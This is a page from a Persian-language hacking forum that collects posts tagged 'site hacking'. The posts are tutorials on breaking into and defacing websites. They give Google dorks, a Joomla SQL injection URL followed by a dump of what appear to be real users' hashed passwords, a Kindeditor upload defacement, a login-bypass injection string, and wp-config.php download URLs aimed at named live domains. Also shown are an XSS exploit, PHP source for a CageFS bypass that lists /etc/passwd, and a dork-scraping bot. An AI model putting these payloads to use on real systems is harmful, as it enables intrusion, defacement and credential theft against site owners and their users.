رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'سایت هکینگ'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

21 نتیجه پیدا شد

  1. سلام خدمت عزیزان گارد ایران. در این درس تصویری شمارو به نحوه بایپس پسورد cms وردپرس و نفوذ وهک کردن سایت آشنا میکنم.همونطور که میدونید تعداد تارگت های وردپرس بسیار زیاده و شما با این باگ و باگهایی که براتون خواهم گذاشت یکی از دیفیسر های خوب خواهید شد. امیدوارم لذت ببرین،در ضمن تشکر فراموش نشه. Pass:guardiran.org یا حق
  2. DeMoN

    آموزش هک سایت جوملا

    باسلام خدمت دوستان گل گارد ایران.این باگ بسیار تارگت های زیادی داره. ابتدا دورک کد PHP: inurl:option=com_tag بعدد این اکسپلوریت و ب اخر ادرس اضافه کن کد PHP: index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component بعد رمز ادمین و تمام کاربرای سایت و بهت میده که باید کرک کنی تا رمز اصلی بدستت بیاد همین اینو ادرس و ببینید حتما متوجه میشید. کد PHP: [Hidden Content],0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=componen t یوزر پسورد کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f:wzhsY2lsdOSY8qfoonzerfwSUgQog9oG:Registered,RuineeCenTuse:ce6d22250374561b8a44c413366463f1:AHxXlDDYnF3uKDyCZetZPWrlvTaTzHJP:Registered,ldx7v2o0y1s:2d4252f1a7b813b1953145d7fb6ace35:HCzd3NO2PdwsRWD7lT7ypS0C1NzOnW4k:Registered,notfl:a053c5bcb94965f6c2115f863af5410c:Vkni051ZsRRSFNNEryvRmImQQDa7agGy:Bloggers,notdpf:b73038b419b6e45637fd6d0661d1a78d:Ls71M34Md4LkcQi8kPSczgRK6pbLXi0G:Bloggers,notprs:e9ac4de97f82ccb5c7ba58297dee4599:GWmvksty6pRgzMQ23zDJ2p9W5P0omQhb:Bloggers,nottf:01cf6d9dd79781997b79c2e6116720ae:m7OijSh3Mg5Gsf6jFnfVueX8kZpJCdi4:Bloggers,maca:b0a16ffe8d18a8ff8c939cb6562f2d98:BGjwJonlCNxMrYn2diaxGmqvZchAZlPh:Manager,notcj:20859b839eab28d8ec20168aa91c0702:h8dp0PAhodBz6Rg7WiC8Xbjmd1HaIY8l:Bloggers,fernando:f12176debaacbc2c8df8801d9ce61762:RRbVK0vvaayMwCDbuwO3VprmqPae0R2K:Super Administrator,Poigma:dbe4ac9117a8bdfb33540e6cb436dbf0:wOfm0qdmU6Y39OFdRBbqEasnclVt72E5:Registered,passm:6d36a8415ba717c7997dc4b8c69813a6:7SXixpFIPRMiLgOApg9m00gSuP2XnhpJ:Bloggers,mcardarelli:60ffc723c55510fed14b837d24eb57d7:EVphmPbG8zxkVQJusIUsIpYwb0iIAYFd:Super Administrator,jmartinez:81f9b64bba3e7173ec55cb8867e05bd3:AwBgVA2Hlkcjtswl2Zqv1vlqWyEy5roc:Bloggers,rbattaglino:3dc4f70ee011b06a1e63018c287af296:jvW18dEeRv2J1XizwEAXRGBzdngZtvHx:Bloggers,cfantini:fe2e6059f00ee1751b17268255f784dc:UIL84SQhEFrkP1f5rLXMeiRK6BUtawOJ:Bloggers,drsabagh:a57833ccebd00963ae0fe31d36f420a5:m1fmT7QbGvcAcQsirwYOVzzJfcTFafO7:Bloggers,eldoceblog:dcec177b8c35a8d8cce5a2ad42aa1384:8JVNUQNJfdrcB0qOqw0D4eMKGHHzxIEw:Bloggers,nottgu:58b7dd1c0f74c3d197b8637894ed2df2:bBK7jG4LzWzodJPmCZagzx2KBm6WojZG:Bloggers,bpqlmhaic:83191c03563c2394645938dccf866747:RM5NJ6VPGTFJbqODxODbyeili6ZW1dR3:Registered,mcqdgyjm:7d56bbc315a6322bc49704c98a1b14f4:Pqjr9Wd3afmWOxUgQam8umbPkDQlfBFc:Registered,qdkrpermv:039c071f1b0389b1fa68b22951dee708:nctL730058fXlVuJOqOxJ6xOrIiJUDJO:Registered,jcqmfuqj:1b1a7479e0a25bd938a1fcfc4b8c779e:K2YRLMtXEJBdyyP44PV9LYA6PMhoYTup:Registered,itanuawlwar:7207f4dfc38c17f1e90c5c85a1a92ed5:Ky595rwJnMLae0nzrrYiEFE9QsyZOfWZ:Registered,Jagmaawarne:94a934b06647b51f8b43321ccce22150:8vFO15ew5GpFFyrUnGJbnI0p1PNaxVZu:Registered,Lindainlsq:b96cd3b9a388c83fb9c54ab4b15d726a:P8uA9S04OqCn3sG5jtT3SG0whHM2AFR9:Registered,pixrumnbcikiar :b3e4185ed84d8154f1d350871b3c7acf:GLaZfrSfXeIkP2Ta2EAWMGxbqkwV6p2o:Registered,oqlvucphuakm:82504aff74e84b1cdfed43ba6eebf7b2:FuQ1DqDFbbijDoW5e5mS4uTdoo9MZtk0:Registered,mcqpeixa:e75ae2fef2a8b0dbdb2b76758961695f:kAe3NWAVhzTrvUg3ULgvPj509ucXXi6w:Registered,Tattfuergylug:cd41dc24c50affc767c0ccb91e36c500:szVeVfcsPPBn5HKEf8APvyC5RomebNT5:Registered,lakeshabrentnal:35b80df934770ea43efa877ecd322f9a:tzmtF1WYapXM8YvbdX5eyV8lSafIqvxQ:Registered,cexexcaby:b16b93d74547bdefdea44e0b4b0a3a66:fsqchpGrgAozKtVF2vMbPf9Wy3tRngIC:Registered,ev7of0n1i1:b211faac87d1829741fefee24640652a:Wc7DMTWCEx6NcNHDpwapjtUp4hktvw64:Registered,lionlionov94:62083001cd4e55b8de21a9d78d41f542:99GGOv9EgADQRAb2v257VdtLdsLNvrfL:Registered,PRICYDRED:2c71d4ae3ba4aac3f787f5d4a6654b74:vRjQDJDWEr9Exa5En71KSt4EftwVlRKh:Registered,loyattgeovosy:5de3f749deeacfed85d660221f25be11:mPVYGS7rwLzYs09hytG22JxJaoW5TvbJ:Registered,Fruttphetle:9f4e50c585dcdd58f8e67874416dc111:wrZrGlX5GI92cz6jUdUoXbXUfnt781Oy:Registered,szybka pozyczka:f6ed603d45b2b52c59e674d109d2d3e7:ylf2R0phRdccKqgUBbaLGnfrrY7bqQ3e:Registered,sherellquist:30b1cbb5029de43b60797bdacace8164:MvoSekJecVvtQ5F3T8Z6fkfFCTLPGpYp:Registered,soccere:dde6d9dd364315492f314596a77724ba:2cxVAfK22a2SRDfpVYOymxWvP9SNRCUz:Registered,tavaClawn:fab72c1cd8e2f6d4a816efb8f53d8084:nRm1E92b9lRAA6p6qZF09yKa3e9kOiyW:Registered,RizBruttiGGer:f0067a8da323b2b79e5faf1a96e12594:ODbj1tSQf5ZvMHTsgq3mfS5DV9GVfcu9:Registered,Irrettekick:2e2ac70458c59caca91f07eae0e4cc8d:w5KdGDLS2P7tWyfJhYoCkle4sDwCvWX9:Registered,wthvqeqle:29128ad6089296febf13d4df716ad3eb:hgdcZZ211PWzi6BYpUXR6GyDUpRYMesW:Registered,roopsybribrak:94599d204adcd80947459fe3c47c29fb:C5GHSeJJzoAWi6OMojXxpabSuoHn3QuZ:Registered,scammajelve:985797b3d10e434fa3e896558960ed80:soymTef38ryeJKSgnQnd6JftGmuKbcUK:Registered,Erommurgitirl:f4feefaf8625907c8c760cf39149f071:RPuP1MbDerILuGAc25YSwsRLrerHLDVm:Registered,Sireworic:ced32b4b681c3db32c96d9278b8f306d:evGr2vJdyrO27ojwOF31p0Vi7vZljVs9:Registered,tdcasinoum:123bc1776494b621c959025395245077:iMQgfg6IESEMsj9DsAaZ7ypASugDtjmA:Registered,Stussyaddessy:bc5e4620accdf2d287c82b1361a47e04:0YaEux9NRHpQ7ubRCDL4jkk6xk5LgzqM:Registered,mxperhapsat:cca3a950e2d46e88e7141daa6c818c2c:9m2StFIKsKkeag7fUQKj3WSbqmZRZ5fB:Registered,DellBealm:c35c17817cff02cc13e45de270826c3c:k4XDteHCb1AYsslSSWbLqqp7RKAc17KS:Registered,Stoodsthoutty:e759edc4b5a035140a19c1001f3450b5:LLiQ4kmKBHrwbzrISFypxy3SU1kqcO7Q:Registered,pewproommern:ca2e27acfc744f88a31787313159852e:L0gSpUjA3FMjtQGJ2pNukDa1gdAsmu36:Registered,Raxybypeanync:c82b2bb6558e6e652b70095d5cf18202:ZgaWbUi4WF7PCsvMtLxWz50LKibyi2fZ:Registered,sueptpoonenry:47be956a2fc3c5dd60ce1dc30ba879a6:pvXWdr6fi89VFcxdznaNkKDtoJjDGQPb:Registered,itaxiaSog:712a83347cb16c221ef102a9d85ab46f:3Hh0ygxYObHrwi5sn22p28qPDqO19DGD:Registered,Pikavippi:6d0de3a90f9e7d2452e4c61a899c16ef:dBWvAFmFNu9xpZPrqndCahY9Pmhs2AOO:Registered,luettamartinat:fe981f239dba3f059715b2d13046305a:bU8MR7No7akWkCRHHxEBjw6f5jxpaoEU:Registered,jcqzfgft:9ea17a7177e19c3fa7c2d83f31894238:FdslMbY979JjHanmT3OTcuLTj8fXTghw:Registered,qpqteqscs:fa499ec1b9b258397af9631cca6a31dc:1BnsFcq8Y6WhwxfCxnnt9VofvaOKVXRj:Registered,ncqsyxeh:a8a32628e840cf951e80121fbc25078e:3I1ZZ0G2NIYmyD3O2jbfHHyLrbQvM0qL:Registered,qpqgsersx:7debb38ea2ad3857448a3320b7affb6c:h6SGQdo1DND0dgc14zQ5hXy8q4d915hA:Registered,rpqjvjyzt:d9cd1e36a3fb8e9cb88dc9edd9bd0d0e:ViilaMDfMPW8cLsfp8oPB0Nu4y8VRiop:Registered,gcqginfy:0828720db32f91f0ed4ca9a5adcfc475:Mtmi7NlDAaQUA0FVkI89dglGuETCUq0w:Registered,elcapo:2ec869e1846922ed5dec839121ef622c:OVEDZ47TFchmIGdZHcsci3LOU1rGfWIp:Registered,gjfqubgg:ca0d6223c9921d6eecb85a5a32d7e40b:ERfQ7bz9X9ebNnkwTKLlXG7DTaPihOap:Registered,wd5a72v4bza:5ff6706b26bea40d52290944166eb9a0:dsurrJ7wA4ztcoIniy3tWpVsQphvDmoN:Registered,Godieguille:075cf076bdd8e2398c06a884a5cd1614:qoROfyj1q9JAHjC206r6c5UbuUGA90Zu:Registered,ocqbzodp:63353152d1efbf1663b90e796e406173:cjusemacgDZJqHpee5bGi5EakKyAwx2I:Registered,ipqjenfmv:3ee4519c31ed4473c8a9ed0b16151835:lSQHpoHhxbhFM4LVUT2unl95rdwfpxRy:Registered,qcqmwjph:81199d1f8d2f1ecc1ef54ae3d31593bf:dwudXGnD1O0XAg6XHCUYT4TUdxDT2Liq:Registered,gjhyiwtf:72140203914c0e5bf827747e5a3a24a2:o1N1vxjD5r5Iwm0MmREbhOcBvAQ5xKrc:Registered,inhapyZiplild:29687540e875e5144333d41682aaca54:ZXlE5NCZep9ASFtusqs46zibXIy3rAhP:Registered,emizine:d82794818f9ad7eea16e158f239e8053:m1SECl144TzFxnKTlkcPmiEpBsmIGTVr:Registered,aluxibo:3fa245fd42b8a55d1008ae49d0bc6e1c:zPFWXZZo5uJdEEpxBRmb2vZxWUrsdjGC:Registered,epqtalllx:960804dc17ba16cffb1d42bcb85961e7:t3Gk4NPUp0nnYnqlUJD8UECJgQ10D1bq:Registered,npqbvfljq:252b27532e9519e9a5f6f1ce3d49db72:1hjvnP7cOEi1V40JvZVCKTzapEhDxKOC:Registered,spoubepiree:c17b9ec9fe751aa999e5a2d227cc4239:UgtZYFjeIdIKYsfssa73wnH2xQQQQgOP:Registered,kasabroot:8864f55f68bd3fc21145d98833968712:PBDVtoO2NYHkPSOkmcD89IFtOiYT3CEw:Registered,kalliefarber:5c7beef5f8aca13fa746b6d7bea19493:74Pbj6hzOoxJpy44pX9YdyBnS4jusXYt:Registered,noli:f6272d470853e135b8dc238a20a1ad7b:RW3DQHpLCTuMHKjhlpZ9upALO0x9ROCd:Registered,vr883q4ujpr:0ebe28552876d6c6dbe8342654305676:OFiyNyLJqvQQGiw18Uug4G387Ow9NINW:Registered,icqsidim:71984c95cefdf32fe76eba2154cb05fa:ow8NyXUlJHFR0G3HpNmgxa1WpPhz1kMA:Registered,gustavopupich:7e08c58be2aa89ef1e4415f6cbbecb65:YcIXvuVnfwCVg0vcpLBNTwsI3FFZgZV3:Registered,outradedo:7e7dccabdeac19ace6dccb4b8c3d9d9b:1DXFbn6uR64WsIwHF0soadVcmzozd2Np:Registered,smagAlamp:358ceea490c3a92cd88c380c3bb183bf:cdGbMGhOfiwmWDDohazMUSuZJt59GGXh:Registered,GoriePreofder:b1f5f48f3aa2447c9990418552476396:KcUi2uRAGF0f5cDgxGO27NskhWJ56W9C:Registered,luli:64de6e815fe854e066f8dd6d7dc6e3ae:F1BaBXLcHhaZfq9h9srbpcYMK9bddMIb:Registered,whiled4801:13a2e72d577a804e77726d6194a55ed4:Jgg5tu6gw6YY3MItj3zrVTGjaGEsddxJ:Registered,sdshbdogfdh:a9bf372d052b8de5ab200b2fe607c044:OQfWprpKWSsIiBJWKtqInzWc0N9FwvOv:Registered,cpqsyakev:da7b86994113c06a8d1f4f8a83d1ea6a:Tc32oj5MMHUUZ4mzajc0tjtyRd4VjxOa:Registered,lkxmqxgmil:461f0aa0c789cc70dfed69559123d51d:fzHUNLgaB2xjHnU3jF3qfG15Ssk0XJBn:Registered,neweffovamymn:1640b00682bd72526228588d45eda7be:nJuIY1onXk4QVaZgdUCUumVsAgGWhbah:Registered,ealjgxrtzef:6b04e286e96819f23605823894150f00:Sq7GNOxdr5AzkfsBWLGaVvGRnSAZssjO:Registered,elba_de_garcia:c39d29ffc83144e58b0552821952f2d5:ruhSLYStijHQiz2GO8qgidN5CDtYdlbY:Registered,wx1g6wps9t8:d2aec83d024470ace3e16c5f88f63710:evFQ3DpTqRsYxNvfIK0Sf9vX5vlCpOMu:Registered,Tisebroorie:ecd71d965ecc1d0b1c9c91e2e092b497:seEKGNXYaF5gsKDtUpLdlVBkYMf9GOfR:Registered,[email protected]<script cf-hash='f9e31' type="text/javascript"> /* */</script>:544d88f2c2d67d32667a06f6da2e501a:A5Iq69sygp6C24bl05UdZ49k95I0noQZ:Registered,eltsleyseri:1ed43577f3a4d8d497833800977feace:3gzMh3ArZ7bZ57kwKF5EjYzLbkAoRi1b:Registered,mary alb:0fcf90aa99048e95c1cf900436814e3d:IgHzZlzrFly8Y25kMA4kExEINpl4vnzy:Registered,rcpicco:0647715abe6719258b4bdf21d96a65c2:8BLd3oCM1aAxidFgsJJtIzH0NtW57Aib:Registered,kcqxueby:a72006b27a0d5311c46dcf5a883831e9:eEUyCHlm9Cp6elVkuBShDZ4IEF1l8BET:Registered,Ephellmef:1b383fabb25262065800656a1e3744b3:f05PPLn0tETKygHcfMdQtvT0DXg20qsE:Registered,overtip:73d0c5ec31a24c73584f0444b7522cb9:KEvwSYlywGw0CRKXRjAXZ5no5nES29nj:Registered,Evorodeeday:7401b8b07f83e0b807e28bb7d9ae07c5:LFGbWqpeL1jspMeT1MtIGKenhciB4u6K:Registered,MELMIRASOLES:a6ea7ccf6fe3ffe2d4adb5447e5b1e9b:ILu0iHrFzkIvZcqhvRZ2Yx6YtFPHfGJh:Registered,GPUENTE:ad71a90512ab00eb730421506fb86813:1SMpPdV4vAK32jy3mVREytergT2FJMzK:Registered,Pigreefug:690c92e5246b3277b6bdf061767caa2f:jClMZa8mLBTFajSCB9ZircIhbMv3E0Ke:Registered,luis alberto:b25b524a904afa77168e85c3df8b2d66:ZhMIhfqBGzDKYJtU5aRw4TUgkmrIqmGV:Registered,dpqrnximc:a880d8349504986c0e940b83be228278:puCLX3JPNG6q4aA32UqdT4HllTb0qyvO:Registered,fcaaesbts:7cf01b5d0124bb54ffae2d9ef40bb1dc:ylnbUfifttZHJ3yI7NUiYrpACa8t40HS:Registered,horasoro:83520878ba07cb1a2bd8f609ef3cb222:Plb1t63r5OrkEv9onFzloBcD0G3VThIU:Registered,DINOCBA:573822f069444966cd5d42eb00afe13f:RcMygvSejODnPSSxlhFui6qWsJnkisxl:Registered,mcambur:ff4a8cc39222bc8fe62ef71c3b58a0a9:1xMKeMDeprsToovex6xwUPwC4qEG8J6F:Registered,ttbbootpin کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f اولی یوزر هست بعد اون پسورد هک کردن سایت های ایرانی ممنوع بوده. یا حق
  3. سلام خدمت عزیزان گارد ایران،در خدمت شما هستیم با آموزش آپلود شل و دیفیس سایت جوملا. نام کامل باگ:JCE Joomla Extension Remote File Upload Pass:guardiran.org [Hidden Content] فقط عذرخواهم که تو انجمن آپ نشد چون هرکار کردم نتونستم آپ کنمش،به هر مقدار بهشی که تقسیم کردم نشد. ارور internet server error میداد. فردا در انجمن آپ میکنم. اسکریپت مورد استفاده در آموزش پیوست شد. Pass:guardiran.org یاحق Jomla-Script.zip
  4. سلام خدمت دوستان عزیز گارد ایران. خوب دوستان اینم یک آموزش مفید و بسیار کاربردی برای دوستان. pass:guardiran.org برای استفاده از آموزش ابتدا تمامی فایل ها رو دانلود و در یک پوشه اکسترکت نمایید. یا حق Jomla Shell Upload Full Privet 8.part1.rar Jomla Shell Upload Full Privet 8.part2.rar
  5. به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران . امروز معروف ترین باگ بین هکرها رو برای شما آوردم این باگ برای استخراج اطلاعات سایت از جمله یوزر و پسورد سایت هست . البته این باگ رو من توی دو بخش متوسط و حرفه ای براتون میزارم چون بعضی ها روش دستیش شاید براشون سخت باشه . =============================================================================================================== Bug name : SQL وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : بی شمار دورک ها : بی شمار ( دورک های زیادی برای سایت های عربی و.... وجود داره ) =============================================================================================================== آموزش هکرها : ابتدا دورک زیر رو توی گوگل سرچ کنید . سپس یکی از سایتها رو باز کنید و این علامت رو جلوش بزارید ' این علامت برای اینه که بفهمیم سایت باگ sql داره یا نه دورک : inurl : index.php?id=1 ( برای پیدا کردن سایت های بیشتر این باگ اون 1 رو به عدد های دیگه تبدیل کنید ) خب وقتی علامت رو اضافه کردید اگر سایت دوباره بدون هیچ مشکلی لود شد یعنی سایت باگ نداره اما اگر با چنین اروری مواجه شدید یعنی سایت باگ داره : err fetch static page>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1 خب تا الان فهمیدیم سایت باگ داره حالا نحوه هکش رو به صورت یه فیلم ازسیستم خودم واستون آماده کردم : لینک فیلم آموزشی : [Hidden Content] فیلم واضح و گویاس . در آخر تشکر یادتون نره . لینک دانلود نرم افزاری که در فیلم استفاده شده اسمش نرم افزار hAVIJ هستش: [Hidden Content] قسمت بعدی این باگ روش هک به صورت دستی باگ SQL
  6. به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران امروز یه باگ برای دیفیسرا آوردم که عاشقش میشن . این باگ فقط مخصوص دیفیسرا هستش و هیچ کاربردی برای هکرها نداره . این باگ نه نیازی به طزریق اکسپلوت داره نه Bypass این باگ در عرض 5 ثانیه دیفیس شما رو با فرمت html و یا حتی شل شما رو با فرمت html آپلود میکنه ( البته آپلود شل یکمی سخته ) به هر حال محبوب ترین باگ برای دیفیسرا هستش . =============================================================================================================== Bug name : Kindeditor وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : About 324 results برای : مس دیفیس و دیفیس کامل ============================================================================================================= آموزش دیفیسرا : ابتدا دورک زیر رو توی گوگل سرچ کنید و یکی از تارگنت های هدف رو انتخاب کنید بعدش کلید Upload رو بزنید و دیفیس خودتونو آپلود کنید . بعدش آدرس داده شده رو جلوی آدرس سایت کپی پیست کنید و تماااااام برید ثبتش کنید دورک :inurl:kindeditor/examples/uploadbutton.html ( نیازی به اکسپلوت نیست خود دورک کار اکسپلوت رو میکنه ) ============================================================================================================= ( قابل ثبت در zone و zone-h ) ( شل هم آپلود میشه البته باید Bypass کنید ) در آخر تشکر یادتون نره یاعلی
  7. درود. ابتدا گوگل دورک: intext:"Powered by MAXSITE 1.10" پنل ادمین: /index.php?name=admin Type in: ' OR '1'='1' -- For both username and password and then login. (Don't forget to add space after --) Demo: Demo: [Hidden Content] [Hidden Content] [Hidden Content]
  8. DeMoN

    اکسپلویت های لینوکس(هک سایت)

    ####################################################################### # # Exploit Title: Cms Made Simple multi vulnerability 1.11.10 # Date: 2014 12 June # Author: Dr.3v1l # Vendor Homepage: [Hidden Content] # Version : 1.11.10 # Tested on: Windows # Category: webapps # Google Dork: intext:"powered by CMS Made Simple" # ####################################################################### # # [+] Exploit : # # Cross site scripting (xss) : # # POST input <default_cms_lang> was set to <fa_IR" onmouseover=prompt(3v1l) bad="> # [Hidden Content] # [Hidden Content] # # Host header attack : # # [Hidden Content] # # PoC : cmsmadesimple\admin\themes\NCleanGrey\login.php # # . # . # . # # <p id="img"><?php echo lang('login_info')?>:</p> # <?php echo lang('login_info_params')?> # # // #vulnerability is here # <span>( <?php echo $_SERVER['HTTP_HOST'];?> )</span> # // --end # # </div> # </div> # <div class="login"> # . # . # . # . # # -------------------------- # # /cmsmadesimple/index.php # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.linkedin.com/in/hossein3v1l # [Hidden Content] # [Hidden Content] # [Hidden Content] # [Hidden Content] # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , Emperor Team # specially of brother Medrik for keep me again researching .. ####################################################################### سلام خدمت دوستان عزیز گارد ایران. خوب در این تاپیک براتون تمامی اکسپلویت های سرور های لینوکس رو قرار میدم و امیدوارم لذت ببرین. یا حق
  9. DeMoN

    تاپیک جامع اکسپلویت ها

    درود بر تمامی عزیزان گارد ایران. در این تاپیک اکسپلویت های مختلف قرار میگیرند. اکسپلویت هایی از قبیل آپلود شل و دیفیس در CMS های مختلف. قوانین تاپیک: 1-اسپم ممنوع 2-طرح سوال در بخش مربوطه. 3-چیزی به جز اکسپلویت در این تاپیک قرار نخواهد گرفت. موفق باشید. ############################################################################################ Wordpress Plugin Slider Revolution 4.1.4 سلام از طریق باگ پلاگین Slider Revolution می توان فایل config.php را دانلود و اطلاعات DataBase را مشاهده کرد. DORK: revslider.php "index of" POC [Hidden Content] DEMO www.redkatana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php www.gaeliccollege.edu/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  10. به نام خدا سلام خدمت دوستان عزیز گارد ایران. در این تاپیک قصد تشریح باگ J.Bird SQL Injection رو دارم ما از این متد در اینجکت دیتابیس استفاده میکنیم. ============================================================= خوب دوستان از همین جا تاپیک رو شروع میکنم. خوب برای اینکه بدون تست تشخیص بدید که نیاز هست از این متد در دیتابیس هکینگ استفاده کنیم یا نه باید ارور هارو مورد بررسی قرار بدید. ارور های این دیتا بیس مانند Fire هست. برخی از این ارورها عبارت اند از: warning: + php یه تابع (function): ibase_query() ibase_fetch_row() ibase_fetch_object() ibase_fetch_assoc() ibase_free_result() برای مثال تارگت زیر: [Hidden Content] اروری که مشاهده میکنیم: Warning: ibase_query(): Dynamic SQL Error SQL error code خوب دوستان این مقدمه ای بر این متد بود. این متد رو در پست های بعدی عملی خواهیم داشت. یا حق
  11. DeMoN

    آموزش باگ PRIV8 CSR

    سلام خدمت تمامی عزیزان یتم. در این آموزش تصویری خدمت شما هستیم با آموزش باگ PRIV8 CSR باگی ساده و با تارگت های بالا خدمت شما عزیزان. امیدوارم لذت ببرین. تشکر فراموش نشه. یا حق Recordings.part1.rar Recordings.part2.rar
  12. DeMoN

    CageFS Bypass

    <?php #Priv8 CageFS BYPASS #By Br0keN #/etc/passwd <center> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Priv8 CageFS Bypass</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#D50428" bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br> etc/passwd/</b></font><br> <?php error_reporting(E_ALL ^ E_NOTICE); if (function_exists('posix_getpwuid')) { if (isset($_POST['Br']) && isset($_POST['x0'])) { $Br = intval($_POST['Br']); $x0 = intval($_POST['x0']); while ($Br < $x0) { $uid = posix_getpwuid($Br); if ($uid) { $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $Br++; } } else { echo ' <form method="POST" action="?br0=x0">Uid FROM : <input type="text" name="Br" value="1" size="4"> TO : <input type="text" name="x0" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Error..! Posix Functions are disabled..!!!"); die(); ?>
  13. DeMoN

    HotBot auto Dorker

    <?php // HotBot project for Dorking // Coded in Morocco 27/11/2014 at 19:18 in my room xD // Greetz to all codersleet members and my friends // dont change the rights // [Hidden Content] //[Hidden Content] print " +-----------------------------+ | HotBot Dorking | | coded by Mr.MaGnoM | | CodersLeet Team | +-----------------------------+ "; echo "\n"; $ch1 =curl_init("[Hidden Content]"); curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1); $keyvoll = curl_exec($ch1); curl_close($ch1); $ma=preg_match("/\.val\('(.*?)'\);/",$keyvoll,$ke); //echo $ke[1]."\n"; //$dork=urlencode($argv[1]); // [Hidden Content]search/web?pn=$i&q=$dork&keyvol=$ke[1] $ch=curl_init(); for($i=1;$i<=30;$i++){ curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,"[Hidden Content]search/web?pn=$i&q=*ur dork here*&keyvol=$ke[1]"); // here ur dork encoded use this site for encode ur dork [Hidden Content] curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+[Hidden Content])'); curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress"); $data=curl_exec($ch); preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches); $links=array_unique($matches[1]); //print_r($matches[1]); $op=@fopen('result.html','a+'); foreach ($links as $ul){ echo "[Hidden Content]"; fwrite($op,"[Hidden 